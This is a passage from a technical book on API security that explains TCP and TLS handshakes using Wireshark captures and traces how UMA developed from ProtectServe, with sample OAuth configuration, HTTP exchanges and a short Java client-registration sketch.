675 under the network working group of IETF in December 1974. After a series of refinements, the version 4 of this specification was published as two RFCs: RFC 791 and RFC 793. The former talks about the Internet Protocol (IP), while the latter is about the Transmission Control Protocol (TCP). The TCP/IP protocol suite presents a four-layered model for network communication as shown in Figure C-1. 
Each layer has its own responsibilities and communicates with each other using a well-defined interface. For example, the Hypertext Transfer Protocol (HTTP) is an application layer protocol, which is transport layer protocol agnostic. HTTP does not care how the packets are transported from one host to another. It can be over TCP or UDP (User Datagram Protocol), which are defined at the transport layer. But 6 Microsoft Strawman Proposal for a Secure Transport Layer Protocol (“STLP”), http://cseweb. ucsd.edu/~bsy/stlp.ps 7 A Protocol for Packet Network Intercommunication, www.cs.princeton.edu/courses/archive/ fall06/cos561/papers/cerf74.pdf Appendix C How TrAnsporT LAyer seCuriTy works? 359 in practice, most of the HTTP traffic goes over TCP. This is mostly due to the inherent characteristics of TCP. During the data transmission, TCP takes care of retransmission of lost data, ordered delivery of packets, congestion control and avoidance, data integrity, and many more. Almost all the HTTP traffic is benefitted from these characteristics of TCP. Neither the TCP nor the UDP takes care of how the Internet layer operates. The Internet Protocol (IP) functions at the Internet layer. Its responsibility is to provide a hardware-independent addressing scheme to the messages pass-through. Finally, it becomes the responsibility of the network access layer to transport the messages via the physical network. The network access layer interacts directly with the physical network and provides an addressing scheme to identify each device the messages pass through. The Ethernet protocol operates at the network access layer. Our discussion from here onward focuses only on TCP, which operates at the transport layer. Any TCP connection bootstraps with a three-way handshake. In other words, TCP is a connection-oriented protocol, and the client has to establish a connection with the server prior to the data transmission. Before the data transmission begins between the client and the server, each party has to exchange with each other a set of parameters. These parameters include the starting packet sequence numbers and many other connection-specific parameters. The client initiates the TCP three- way handshake by sending a TCP packet to the server. This packet is known as the SYN packet. SYN is a flag set in the TCP packet. The SYN packet includes a randomly picked sequence number by the client, the source (client) port number, destination (server) port number, and many other fields as shown in Figure C-2. If you look closely at Figure C-2, you will notice that the source (client) IP address and the destination (server) IP address are outside the TCP packet and are included as part of the IP packet. As discussed before, IP operates at the network layer, and the IP addresses are defined to be hardware independent. Another important field here that requires our attention is the TCP Segment Len field. This field indicates the length of the application data this packet carries. For all the messages sent during the TCP three-way handshake, the value of the TCP Segment Len field will be zero, as no exchange has started yet. Appendix C How TrAnsporT LAyer seCuriTy works? 360 Once the server receives the initial message from the client, it too picks its own random sequence number and passes it back in the response to the client. This packet is known as the SYN ACK packet. The two main characteristics of TCP, error control (recover from lost packets) and ordered delivery, require each TCP packet to be identified uniquely. 
The exchange of sequence numbers between the client and the server helps to keep that promise. Once the packets are numbered, both sides of the communication channel know which packets get lost during the transmission and duplicate packets and how to order a set of packets, which are delivered in a random order. Figure C-3 shows a sample TCP SYN ACK packet captured by Wireshark. This includes the source (server) port, destination (client) port, server sequence number, and Figure C-2. TCP SYN packet captured by Wireshark, which is an open source packet analyzer Figure C-1. TCP/IP stack: protocol layer Appendix C How TrAnsporT LAyer seCuriTy works? 361 the acknowledgement number. Adding one to the client sequence number found in the SYN packet derives the acknowledgement number. Since we are still in the three-way handshake, the value of the TCP Segment Len field is zero. Figure C-3. TCP SYN ACK packet captured by Wireshark Figure C-4. TCP ACK packet captured by Wireshark To complete the handshake, the client will once again send a TCP packet to the server to acknowledge the SYN ACK packet it received from the server. This is known as the ACK packet. Figure C-4 shows a sample TCP ACK packet captured by Wireshark. This includes the source (client) port, destination (server) port, initial client sequence number + 1 as the new sequence number, and the acknowledgement number. Adding one to the server sequence number found in the SYN ACK packet derives the Appendix C How TrAnsporT LAyer seCuriTy works? 362 acknowledgement number. Since we are still in the three-way handshake, the value of the TCP Segment Len field is zero. Once the handshake is complete, the application data transmission between the client and the server can begin. The client sends the application data packets to the server immediately after it sends the ACK packet. The transport layer gets the application data from the application layer. Figure C-5 is a captured message from Wireshark, which shows the TCP packet corresponding to an HTTP GET request to download an image. The HTTP, which operates at the application layer, takes care of building the HTTP message with all relevant headers and passes it to the TCP at the transport layer. Whatever the data it receives from the application layer, the TCP encapsulates with its own headers and passes it through the rest of the layers in the TCP/IP stack. How TCP derives the sequence number for the first TCP packet, which carries the application data, is explained under the side bar “How does TCP sequence numbering work?” If you look closely at the value of the TCP Segment Len field in Figure C-5, you will notice that it is now set to a nonzero value. Figure C-5. TCP packet corresponding to an HTTP GET request to download an image captured by Wireshark Appendix C How TrAnsporT LAyer seCuriTy works? 363 Once the application data transmission between the client and the server begins, the other should acknowledge each data packet sent by either party. As a response to the first TCP packet sent by the client, which carries application data, the server will respond with a TCP ACK packet, as shown in Figure C-6. How TCP derives the sequence number and the acknowledgement number for this TCP ACK packet is explained under the side bar “How does TCP sequence numbering work?” Figure C-6. TCP ACK from the server to the client captured by Wireshark HOW DOES TCP SEQUENCE NUMBERING WORK? 
whenever either of the two parties at either end of the communication channel wants to send a message to the other, it sends a packet with the ACk flag as an acknowledgement to the last received sequence number from that party. if you look at the very first syn packet (Figure C-2) sent from the client to the server, it does not have an ACk flag, because prior to the syn packet, the client didn’t receive anything from the server. From there onward, every packet sent either by the server or the client has the ACk flag and the Acknowledgement Number field in the TCp packet. in the syn ACk packet (Figure C-3) from the server to the client, the value of the Acknowledgement Number is derived by adding one to the sequence number of the last packet received by the server (from the client). in other words, the Acknowledgement Number field here, from the server to the client, represents the sequence number of the next expected packet. Also if you closely look at the TCp segment Len field in each TCp packet of the three- way handshake, the value of it is set to zero. even though we mentioned before that the Appendix C How TrAnsporT LAyer seCuriTy works? 364 Acknowledgement Number field in syn ACk is derived by adding one to the sequence number found in the syn packet from the client, precisely what happens is the server adds 1 + the value of the TCp segment Len field from the client to the current sequence number to derive the value of the Acknowledgement Number field. The same applies to the ACk packet (Figure C-4) sent from the client to the server. Adding 1 + the value of the TCp segment Len field from the server to the sequence number of the last packet received by the client (from the server) derives the Acknowledgement Number field there. The value of the sequence number in the ACk packet is the same as the value of the Acknowledgement Number in the syn ACk packet from the server. The client starts sending real application data only after the three-way handshake is completed. Figure C-5 shows the first TCp packet, which carries application data from the client to the server. if you look at the sequence number in that TCp packet, it’s the same from the previous packet (ACk packet as shown in Figure C-4) sent from the client to the server. After client sends the ACk packet to the server, it receives nothing from the server. That implies the server still expects a packet with a sequence number, which matches the value of the Acknowledgement Number in the last packet it sent to the client. if you look at Figure C-5, which is the first TCp packet with application data, the value of the TCp segment Len field is set to a nonzero value, and as per Figure C-6, which is the ACk to the first packet with the application data sent by the client, the value of Acknowledgement Number is set correctly to the value of the TCp segment Len field + 1 + the current sequence number from the client. How Transport Layer Security (TLS) Works Transport Layer Security (TLS) protocol can be divided into two phases: the handshake and the data transfer. During the handshake phase, both the client and the server get to know about each other’s cryptographic capabilities and establish cryptographic keys to protect the data transfer. The data transfer happens at the end of the handshake. The data is broken down into a set of records, protected with the cryptographic keys established in the first phase, and transferred between the client and the server. 
Figure C-7 shows how TLS fits in between other transport and application layer protocols. TLS was initially designed to work on top of a reliable transport protocol like TCP (Transmission Control Protocol). However, TLS is also being used with unreliable transport layer protocols like UDP (User Datagram Protocol). The RFC 6347 defines the Appendix C How TrAnsporT LAyer seCuriTy works? 365 Datagram Transport Layer Security (DTLS) 1.2, which is the TLS equivalent in the UDP world. The DTLS protocol is based on the TLS protocol and provides equivalent security guarantees. This chapter only focuses on TLS. Figure C-7. TLS protocol layers Transport Layer Security (TLS) Handshake Similar to the three-way TCP handshake (see Figure C-8), TLS too introduces its own handshake. The TLS handshake includes three subprotocols: the Handshake protocol, the Change Cipher Spec protocol, and the Alert protocol (see Figure C-7). The Handshake protocol is responsible for building an agreement between the client and the server on cryptographic keys to be used to protect the application data. Both the client and the server use the Change Cipher Spec protocol to indicate to each other that it’s going to switch to a cryptographically secured channel for further communication. The Alert protocol is responsible for generating alerts and communicating them to the parties involved in the TLS connection. For example, if the server certificate the client receives during the TLS handshake is a revoked one, the client generates the certificate_revoked alert. Appendix C How TrAnsporT LAyer seCuriTy works? 366 The TLS handshake happens after the TCP handshake. For the TCP or for the transport layer, everything in the TLS handshake is just application data. Once the TCP handshake is completed, the TLS layer will initiate the TLS handshake. The Client Hello is the first message in the TLS handshake from the client to the server. As you can see in Figure C-9, the sequence number of the TCP packet is 1, as expected, since this is the very first TCP packet, which carries application data. The Client Hello message includes the highest version of the TLS protocol the client supports, a random number generated by the client, cipher suites and the compression algorithm supported by the client, and an optional session identifier (see Figure C-9). The session identifier is used to resume an existing session rather than doing the handshake again from scratch. The TLS handshake is very CPU intensive, but with the support for session resumption, this overhead can be minimized. Figure C-8. TLS handshake Appendix C How TrAnsporT LAyer seCuriTy works? 367 Note TLs session resumption has a direct impact on performance. The master key generation process in the TLs handshake is extremely costly. with session resumption, the same master secret from the previous session is reused. it has been proven through several academic studies that the performance enhancement resulting from TLs session resumption can be up to 20%. session resumption also has a cost, which is mostly handled by servers. each server has to maintain the TLs state of all its clients and also to address high-availability aspects; it needs to replicate this state across different nodes in the cluster. Figure C-9. TLS Client Hello captured by Wireshark Appendix C How TrAnsporT LAyer seCuriTy works? 368 One key field in the Client Hello message is the Cipher Suites. Figure C-12 expands the Cipher Suites field of Figure C-10. 
The Cipher Suites field in the Client Hello message carries all the cryptographic algorithms supported by the client. The message captured in Figure C-12 shows the cryptographic capabilities of the Firefox browser version 43.0.2 (64-bit). A given cipher suite defines the server authentication algorithm, the key exchange algorithm, the bulk encryption algorithm, and the message integrity algorithm. For example, in TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 cipher suite, RSA is the authentication algorithm, ECDHE is the key exchange algorithm, AES_128_GCM is the bulk encryption algorithm, and SHA256 is the message integrity algorithm. Any cipher suite that starts with TLS is only supported by the TLS protocols. As we proceed in this appendix, we will learn the purpose of each algorithm. Once the server receives the Client Hello message from the client, it responds back with the Server Hello message. The Server Hello is the first message from the server to the client. To be precise, the Server Hello is the first message from the server to the client, which is generated at the TLS layer. Prior to that, the TCP layer of the server responds back to the client with a TCP ACK message (see Figure C-11). All TLS layer messages are Figure C-10. TLS Client Hello expanded version captured by Wireshark Appendix C How TrAnsporT LAyer seCuriTy works? 369 treated as application data by the TCP layer, and each message will be acknowledged either by the client or the server. From here onward, we will not talk about TCP ACK messages. Figure C-11. TCP ACK message from the server to the client The Server Hello message includes the highest version of TLS protocol that both the client and the server can support, a random number generated by the server, the strongest cipher suite, and the compression algorithm that both the client and the server can support (see Figure C-13). Both parties use the random numbers generated by each other (the client and the server) independently to generate the master secret. This master secret will be used later to derive encryption keys. To generate a session identifier, the server has several options. If no session identifier is included in the Client Hello message, the server generates a new one. Even the client includes one; but if the server can’t resume that session, then once again a new identifier is generated. If the server is capable of resuming the TLS session corresponding to the session identifier specified in the Client Hello message, then the server includes it in the Server Hello message. The server may also decide not to include any session identifiers for any new sessions that it’s not willing to resume in the future. Appendix C How TrAnsporT LAyer seCuriTy works? 370 Note in the history of TLs, several attacks have been reported against the TLs handshake. Cipher suite rollback and version rollback are a couple of them. This could be a result of a man-in-the-middle attack, where the attacker intercepts the TLs handshake and downgrades either the cipher suite or the TLs version, or both. The problem was fixed from ssL 3.0 onward with the introduction of the Change Cipher Spec message. This requires both parties to share the hash of all TLs handshake messages up to the Change Cipher Spec message exactly as each party read them. each has to confirm that they read the messages from each other in the same way. Figure C-12. Cipher suites supported by the TLS client captured by Wireshark Appendix C How TrAnsporT LAyer seCuriTy works? 
371 After the Server Hello message is sent to the client, the server sends its public certificate, along with other certificates, up to the root certificate authority (CA) in the certificate chain (see Figure C-14). The client must validate these certificates to accept the identity of the server. It uses the public key from the server certificate to encrypt the premaster secret key later. The premaster key is a shared secret between the client and the server to generate the master secret. If the public key in the server certificate isn’t capable of encrypting the premaster secret key, then the TLS protocol mandates another extra step, known as the Server Key Exchange (see Figure C-14). During this step, the server has to create a new key and send it to the client. Later the client will use it to encrypt its premaster secret key. If the server demands TLS mutual authentication, then the next step is for the server to request the client certificate. The client certificate request message from the server includes a list of certificate authorities trusted by the server and the type of the certificate. After the last two optional steps, the server sends the Server Hello Done message to the client (see Figure C-14). This is an empty message that only indicates to the client that the server has completed its initial phase in the handshake. If the server demands the client certificate, now the client sends its public certificate along with all other certificates in the chain up to the root certificate authority (CA) required to validate the client certificate. Next is the Client Key Exchange message, which includes the TLS protocol version as well as the premaster secret key Figure C-13. TLS Server Hello captured by Wireshark Appendix C How TrAnsporT LAyer seCuriTy works? 372 (see Figure C-15). The TLS protocol version must be the same as specified in the initial Client Hello message. This is a guard against any rollback attacks to force the server to use an unsecured TLS/SSL version. The premaster secret key included in the message should be encrypted with the server’s public key obtained from the server certificate or with the key passed in the Server Key Exchange message. The Certificate Verify message is the next in line. This is optional and is needed only if the server demands client authentication. The client has to sign the entire set of TLS handshake messages that have taken place so far with its private key and send the signature to the server. The server validates the signature using the client’s public key, which was shared in a previous step. The signature generation process varies depending on which signing algorithm picked during the handshake. If RSA is being used, then the hash of all the previous handshake messages is calculated with both MD5 and SHA-1. Then the concatenated hash is encrypted using the client’s private key. If the signing algorithm picked during the handshake is DSS (Digital Signature Standard), only a SHA- 1 hash is used, and it’s encrypted using the client’s private key. Figure C-14. Certificate, Server Key Exchange, and Server Hello Done captured by Wireshark Appendix C How TrAnsporT LAyer seCuriTy works? 373 At this point, the client and the server have exchanged all the required materials to generate the master secret. The master secret is generated using the client random number, the server random number, and the premaster secret. 
The client now sends the Change Cipher Spec message to the server to indicate that all messages generated from here onward are protected with the keys already established (see Figure C-15). The Finished message is the last one from the client to the server. It’s the hash of the complete message flow in the TLS handshake encrypted by the already established keys. Once the server receives the Finished message from the client, it responds back with the Change Cipher Spec message (see Figure C-16). This indicates to the client that the server is ready to start communicating with the secret keys already established. Finally, the server will send the Finished message to the client. This is similar to the Finished message generated by the client and includes the hash of the complete message flow in the handshake encrypted by the generated cryptographic keys. This completes the TLS handshake, and here onward both the client and the server can send data over an encrypted channel. Figure C-15. Client Key Exchange and Change Cipher Spec captured by Wireshark Appendix C How TrAnsporT LAyer seCuriTy works? 374 TLS VS. HTTPS HTTp operates at the application layer of the TCp/ip stack, while the TLs operates between the application layer and the transport layer (see Figure C-1). The agent (e.g., the browser) acting as the HTTp client should also act as the TLs client to initiate the TLs handshake, by opening a connection to a specific port (default 443) at the server. only after the TLs handshake is completed, the agent should initiate the application data exchange. All HTTp data are sent as TLs application data. HTTp over TLs was initially defined by the rFC 2818, under the ieTF network working group. The rFC 2818 further defines a uri format for HTTp over TLs traffic, to differentiate it from plain HTTp traffic. HTTp over TLs is differentiated from HTTp uris by using the https protocol identifier in place of the http protocol identifier. The rFC 2818 was later updated by two rFCs: rFC 5785 and rFC 7230. Application Data Transfer After the TLS handshake phase is complete, sensitive application data can be exchanged between the client and the server using the TLS Record protocol (Figure C-18). This protocol is responsible for breaking all outgoing messages into blocks and assembling all incoming messages. Each outgoing block is compressed; Message Authentication Code (MAC) is calculated and encrypted. Each incoming block is decrypted, decompressed, Figure C-16. Server Change Cipher Spec captured by Wireshark Appendix C How TrAnsporT LAyer seCuriTy works? 375 and MAC verified. Figure C-17 summarizes all the key messages exchanged in the TLS handshake. Figure C-17. TLS handshake During the TLS handshake, each side derives a master secret using the client- generated random key, the server-generated random key, and the client-generated premaster secret. All these three keys are shared between each other during the TLS handshake. The master secret is never transferred over the wire. Using the master secret, each side generates four more keys. The client uses the first key to calculate the MAC for each outgoing message. The server uses the same key to validate the MAC of all incoming messages from the client. The server uses the second key to calculate the MAC for each outgoing message. The client uses the same key to validate the MAC of all incoming messages from the server. The client uses the third key to encrypt outgoing messages, and the server uses the same key to decrypt all incoming messages. 
The server uses the fourth key to encrypt outgoing messages, and the client uses the same key to decrypt all incoming messages. Appendix C How TrAnsporT LAyer seCuriTy works? 376 REVERSE-ENGINEERING TLS For each session, TLs creates a master secret and derives four keys from it for hashing and encryption. what if the private key of the server leaked out? if all the data transferred between clients and the server is being recorded, can it be decrypted? yes, it can. if the TLs handshake is recorded, you can decrypt the premaster secret if you know the server’s private key. Then, using the client-generated random number and the server-generated random number, you can derive the master secret—and then the other four keys. using these keys, you can decrypt the entire set of recorded conversations. using perfect forward secrecy (pFs) can prevent this. with pFs, just as in TLs, a session key is generated, but the session key can’t later be derived back from the server’s master secret. This eliminates the risk of losing the confidentiality of the data if a private key leaks out. To add support for pFs, both the server and the client participating in the TLs handshake should support a cipher suite with ephemeral diffie-Hellman (dHe) or the elliptic-curve variant (eCdHe). Note Google enabled forward secrecy for Gmail, Google+, and search in november 2011. Figure C-18. Server Change Cipher Spec captured by Wireshark Appendix C How TrAnsporT LAyer seCuriTy works? 377 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_19 APPENDIX D UMA Evolution User-Managed Access (UMA, pronounced “OOH-mah”) is an OAuth 2.0 profile. OAuth 2.0 decouples the resource server from the authorization server. UMA takes one step forward: it lets you control a distributed set of resource servers from a centralized authorization server. It also enables the resource owner to define a set of policies at the authorization server, which can be evaluated at the time a client is granted access to a protected resource. This eliminates the need for the resource owner’s presence to approve access requests from arbitrary clients or requesting parties. The authorization server can make the decision based on the policies defined by the resource owner. ProtectServe UMA has its roots in the Kantara Initiative. The Kantara Initiative is a nonprofit professional association focused on building digital identity management standards. The first meeting of the UMA working group was held on August 6, 2009. There were two driving forces behind UMA: ProtectServe and vendor relationship management (VRM). ProtectServe is a standard that was heavily influenced by VRM. The goal of ProtectServe was to build a permission-based data-sharing model that was simple, secure, efficient, RESTful, powerful, OAuth-based, and system identity agnostic. ProtectServe defines four parties in its protocol flow: the user, the authorization manager, the service provider, and the consumer. The service provider (SP) manages the user’s resources and exposes them to the rest of the world. The authorization manager (AM) keeps track of all service providers associated with a given user. The user is the resource owner, who introduces all the service providers (or the applications he or she works with) to the authorization manager and builds access control policies that define the basis on which to share resources with others. The consumer consumes the user’s resources via the SP. 
Before consuming any services or resources, the consumer must request an access grant from the AM. The requested access grant is evaluated at the AM against the policies defined on the associated service by its owner. ProtectServe uses OAuth 1.0 (see Appendix B) as the protocol for access delegation. The steps in the ProtectServe protocol flow are as follows.

Step 1: The user or the resource owner introduces the SP to the AM (see Figure D-1).

1. The user provides the metadata URL of the AM to the SP.
2. The SP talks to the metadata endpoint of the AM and gets details related to the consumer key issuer, the request token issuer, the access token issuer, and the associated policies (the OAuth 1.0 specification defines consumer key, request token, and access token).
3. The SP initiates an OAuth 1.0 flow by requesting an OAuth request token from the request token issuer (which could be the same AM).
4. The AM generates an authorization request token and sends it back to the SP along with the other parameters defined under the OAuth 1.0 specification.
5. The SP redirects the user to the AM with a token reference, along with the other parameters defined under the OAuth 1.0 specification, to get it authorized.
6. Once authorized by the user, the authorization manager returns the authorized request token, along with the other parameters defined under the OAuth 1.0 specification, to the SP.
7. To complete the OAuth 1.0 flow, the SP exchanges the authorized request token for an access token with the AM.
8. Once the OAuth flow is completed, the SP talks to the AM endpoint (which is secured with OAuth 1.0) to get an SP handle.
9. The AM validates the OAuth signature and, once verified, issues an SP handle to the SP. An SP handle is a unique identifier generated by the AM to identify the SP in future communications.

That completes the initial step in the ProtectServe protocol flow.

Note: The service provider handle is a key that uniquely identifies the service provider at the authorization manager. This information is publicly available. A given service provider can have multiple service provider handles—one for each associated authorization manager.

Figure D-1. The service provider bootstraps trust with the authorization manager

Step 2: Each consumer who wants to get access to protected resources must be provisioned with corresponding consumer keys:

1. The consumer tries to access a protected resource hosted in an SP.
2. The SP detects the unauthenticated access attempt and returns an HTTP 401 status code with the details required to get the SP metadata (see Figure D-2).
3. With the details in the 401 response, the consumer talks to the SP's metadata endpoint (see Figure D-2).
4. The SP metadata endpoint returns the SP handle (which is registered at the AM) and the corresponding AM endpoint.
5. The consumer talks to the AM endpoint to obtain a consumer key and a consumer secret (see Figure D-3).
6. The consumer requests an access token from the AM, with its consumer key and the SP handle. The request must be digitally signed with the corresponding consumer secret.
7. The AM validates the parameters in the access token request and issues an access token and a token secret to the consumer.

Figure D-2. The consumer is rejected by the service provider with a 401 response. R1 represents a resource

Figure D-3. The consumer gets an access token from the authorization manager
Step 3: A consumer with a valid access token can access the protected resource hosted in the SP (see Figure D-4):

1. The consumer tries to access the protected resource in the SP with its access token, signed with the access token secret.
2. The SP talks to the AM and gets the secret key corresponding to the consumer's access token. If required, the SP can store it locally.
3. The SP validates the signature of the request using the access token secret.
4. If the signature is valid, the SP talks to the policy decision endpoint of the AM, passing the access token and the SP handle. The request must be digitally signed with the corresponding access token secret.
5. The AM first validates the request, next evaluates the corresponding policies set by the user or the resource owner, and then sends the decision to the SP.
6. If the decision is a Deny, the location of the terms is returned to the SP, and the SP returns the location to the consumer with a 403 HTTP status code.
7. The consumer requests the terms by talking to the terms endpoint hosted in the AM. The request includes the consumer key and is signed with the consumer secret.
8. When the consumer receives the terms, it evaluates them and talks to the AM with additional information to prove its legitimacy. This request includes the consumer key and is signed with the consumer secret.
9. The AM evaluates the additional information and claims provided by the consumer. If those meet the required criteria, the AM creates an agreement resource and sends the location of the agreement resource to the consumer.
10. If this requires the user's consent, the AM must send it for the user's approval before sending the location of the agreement resource.
11. Once the consumer receives the location of the agreement resource, it can talk to the corresponding endpoint hosted in the AM and get the agreement resource to see the status.

Figure D-4. The consumer accesses a resource hosted at the service provider with valid OAuth credentials, but with limited privileges

Step 4: Once approved by the authorization manager, the consumer can access the protected resource with its access token and the corresponding secret key (see Figure D-5):

1. The consumer tries to access the protected resource at the SP with its access token, signed with the access token secret.
2. The SP talks to the AM and gets the secret key corresponding to the consumer's access token. If required, the SP can store it locally.
3. The SP validates the signature of the request using the access token secret.
4. If the signature is valid, the SP talks to the policy decision endpoint of the AM, passing the access token and the SP handle, signed with the corresponding access token secret.
5. The AM first validates the request, next evaluates the corresponding policies set by the user or the resource owner, and then sends the decision to the SP.
6. If the decision is an Allow from the AM, the SP returns the requested resource to the corresponding consumer.
7. The SP can cache the decision from the AM. Subsequent calls by the same consumer for the same resource can use the cache instead of going back to the AM.

Figure D-5. The consumer accesses a resource hosted at the SP with valid OAuth credentials and with the required privileges

UMA and OAuth

Over the years, ProtectServe evolved into UMA.
ProtectServe used OAuth 1.0 to protect its APIs, and UMA moved from OAuth 1.0 to OAuth WRAP and then to OAuth 2.0. The UMA specification, which was developed under the Kantara Initiative for almost three years, was submitted to the IETF OAuth working group on July 9, 2011, as a draft recommendation for a user-managed data access protocol.

UMA 1.0 Architecture

The UMA architecture has five main components (see Figure D-6): the resource owner (analogous to the user in ProtectServe), the resource server (analogous to the service provider in ProtectServe), the authorization server (analogous to the authorization manager in ProtectServe), the client (analogous to the consumer in ProtectServe), and the requesting party. These five components interact with each other during the three phases defined in the UMA core specification.

Figure D-6. UMA high-level architecture

UMA 1.0 Phases

The first phase of UMA (see the UMA core specification at https://docs.kantarainitiative.org/uma/rec-uma-core.html) is to protect the resource. The resource owner initiates this phase by introducing the resource servers associated with him or her to a centralized authorization server. The client initiates the second phase when it wants to access a protected resource. The client talks to the authorization server and obtains the required level of authorization to access the protected resource that's hosted in the resource server. Finally, in the third phase, the client directly accesses the protected resource.

UMA Phase 1: Protecting a Resource

Resources are owned by the resource owner and may live on different resource servers. Let's look at an example. Suppose my photos are with Flickr, my calendar is with Google, and my friend list is with Facebook. How can I protect all these resources, which are distributed across different resource servers, with a centralized authorization server? The first step is to introduce the centralized authorization server to Flickr, Google, and Facebook—to all the resource servers. The resource owner must do this. The resource owner can log in to each resource server and provide the authorization server configuration endpoint to each of them. The authorization server must provide its configuration data in JSON format. The following is a set of sample configuration data related to the authorization server. Data in this JSON format should be understood by any resource server that supports UMA.
This section digs into the details of each configuration element as you proceed:

{
  "version":"1.0",
  "issuer":"https://auth.server.com",
  "pat_profiles_supported":["bearer"],
  "aat_profiles_supported":["bearer"],
  "rpt_profiles_supported":["bearer"],
  "pat_grant_types_supported":["authorization_code"],
  "aat_grant_types_supported":["authorization_code"],
  "claim_profiles_supported":["openid"],
  "dynamic_client_endpoint":"https://auth.server.com/dyn_client_reg_uri",
  "token_endpoint":"https://auth.server.com/token_uri",
  "user_endpoint":"https://auth.server.com/user_uri",
  "resource_set_registration_endpoint":"https://auth.server.com/rs/rsrc_uri",
  "introspection_endpoint":"https://auth.server.com/rs/status_uri",
  "permission_registration_endpoint":"https://auth.server.com/perm_uri",
  "rpt_endpoint":"https://auth.server.com/rpt",
  "authorization_request_endpoint":"https://auth.server.com/authorize"
}

Once the resource server is introduced to the authorization server via its configuration data endpoint, the resource server can talk to the Dynamic Client Registration (RFC 7591) endpoint (dynamic_client_endpoint) to register itself at the authorization server. The client registration endpoint exposed by the authorization server may or may not be secured. It can be secured with OAuth, HTTP Basic authentication, Mutual TLS, or any other security protocol, as desired by the authorization server. Even though the Dynamic Client Registration profile (RFC 7591) doesn't enforce any authentication protocol over the registration endpoint, it must be secured with TLS. If the authorization server decides to allow the endpoint to be public and let anyone register, it can do so. To register a client, you pass all its metadata to the registration endpoint. Here's a sample JSON message for client registration:

POST /register HTTP/1.1
Content-Type: application/json
Accept: application/json
Host: authz.server.com

{
  "redirect_uris":["https://client.org/callback","https://client.org/callback2"],
  "token_endpoint_auth_method":"client_secret_basic",
  "grant_types": ["authorization_code", "implicit"],
  "response_types": ["code", "token"]
}

A successful client registration results in the following JSON response, which includes the client identifier and the client secret to be used by the resource server:

HTTP/1.1 200 OK
Content-Type: application/json
Cache-Control: no-store
Pragma: no-cache

{
  "client_id":"iuyiSgfgfhffgfh",
  "client_secret": "hkjhkiiu89hknhkjhuyjhk",
  "client_id_issued_at":2343276600,
  "client_secret_expires_at":2503286900,
  "redirect_uris":["https://client.org/callback","https://client.org/callback2"],
  "grant_types": "authorization_code",
  "token_endpoint_auth_method": "client_secret_basic"
}

Note: You aren't required to use the Dynamic Client Registration API. Resource servers can use any method they prefer to register at the authorization server. The registration at the authorization server is a one-time operation, not per resource owner. If a given resource server has already been registered with a given authorization server, it doesn't need to register again when the same authorization server is introduced by a different resource owner.
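As a rough illustration of the registration call, the following minimal sketch posts a client registration request with java.net.HttpURLConnection. The endpoint and the metadata values are the sample values shown above, not a real authorization server, and error handling is omitted.

import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.URL;
import java.nio.charset.StandardCharsets;

public class DynamicClientRegistration {
    public static void main(String[] args) throws Exception {
        // dynamic_client_endpoint from the sample authorization server configuration
        URL endpoint = new URL("https://auth.server.com/dyn_client_reg_uri");
        String body = "{"
                + "\"redirect_uris\":[\"https://client.org/callback\"],"
                + "\"token_endpoint_auth_method\":\"client_secret_basic\","
                + "\"grant_types\":[\"authorization_code\"],"
                + "\"response_types\":[\"code\"]"
                + "}";

        HttpURLConnection conn = (HttpURLConnection) endpoint.openConnection();
        conn.setRequestMethod("POST");
        conn.setRequestProperty("Content-Type", "application/json");
        conn.setRequestProperty("Accept", "application/json");
        conn.setDoOutput(true);
        try (OutputStream os = conn.getOutputStream()) {
            os.write(body.getBytes(StandardCharsets.UTF_8));
        }
        // A successful registration returns the client_id and client_secret
        // shown in the sample response above.
        System.out.println("HTTP status: " + conn.getResponseCode());
    }
}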
Once the initial resource server registration process is complete, the next step in the first phase is for the resource server to obtain a Protection API token (PAT) to access the Protection API exposed by the authorization server. (You learn more about the PAT in the section "Protection API," later in this appendix.) The PAT is issued per resource server, per resource owner. In other words, each resource owner must authorize a PAT so the resource server can use it to protect that owner's resources with the centralized authorization server. The authorization server configuration file declares the types of PAT it supports. In the previous example, the authorization server supports OAuth 2.0 bearer tokens:

"pat_profiles_supported":["bearer"]

In addition to the PAT token type, the authorization server configuration file also declares the way to obtain the PAT. In this case, it should be via the OAuth 2.0 authorization code grant type. The resource server must initiate an OAuth flow with the authorization code grant type to obtain the PAT in bearer format:

"pat_grant_types_supported":["authorization_code"]

Note: The scope of the PAT must be http://docs.kantarainitiative.org/uma/scopes/prot.json. This must be included in the scope value of the authorization code grant request.

The following is a sample authorization code grant request to obtain a PAT:

GET /authorize?response_type=code
  &client_id=dsdasDdsdsdsdsdas
  &state=xyz
  &redirect_uri=https://flickr.com/callback
  &scope=http://docs.kantarainitiative.org/uma/scopes/prot.json HTTP/1.1
Host: auth.server.com

Once the resource server gets the PAT, the PAT can be used to access the Resource Set Registration API exposed by the authorization server, to register the set of resources that needs to be protected by the given authorization server. The endpoint of the Resource Set Registration API is defined in the authorization server configuration file (you learn more about the Resource Set Registration API in the section "Protection API"):

"resource_set_registration_endpoint":"https://auth.server.com/rs/rsrc_uri"

UMA Phase 2: Getting Authorization

According to the UMA specification, phase 2 begins after a failed access attempt by the client. The client tries to access a resource hosted in the resource server and gets an HTTP 403 status code (see Figure D-7). In addition to the 403 response, the resource server includes the endpoint (as_uri) of the corresponding authorization server where the client can obtain a requesting party token (RPT):

HTTP/1.1 403 Forbidden
WWW-Authenticate: UMA realm="my-realm",
  host_id="photos.flickr.com",
  as_uri=https://auth.server.com

According to UMA, to access a protected resource, the client must present a valid RPT. (You learn more about the RPT in the section "Authorization API.") The RPT endpoint that must be included in the 403 response is declared in the authorization server configuration file:

"rpt_endpoint":"https://auth.server.com/rpt"

Once rejected by the resource server with a 403, the client has to talk to the RPT endpoint of the authorization server. To do so, the client must have an Authorization API token (AAT). To get an AAT, the client must be registered at the corresponding authorization server. The client can use the OAuth Dynamic Client Registration API or any other way it prefers to register. After it's registered with the authorization server, the client gets a client key and a client secret. The requesting party can be a different entity from the client. For example, the client can be a mobile application or a web application, whereas the requesting party could be a human user who uses either the mobile application or the web application.
The ultimate goal is for the requesting party to access an API owned by a resource owner, hosted in a resource server, via a client application. To achieve this, the requesting party should get an RPT from an authorization server trusted by the resource server. To get an RPT, the requesting party should first get an AAT via the client application. To get an AAT, the client must follow an OAuth grant type supported by the authorization server for issuing AATs. That is declared in the authorization server's configuration file. In this case, the authorization server supports the authorization code grant type for issuing AATs:

"aat_grant_types_supported":["authorization_code"]

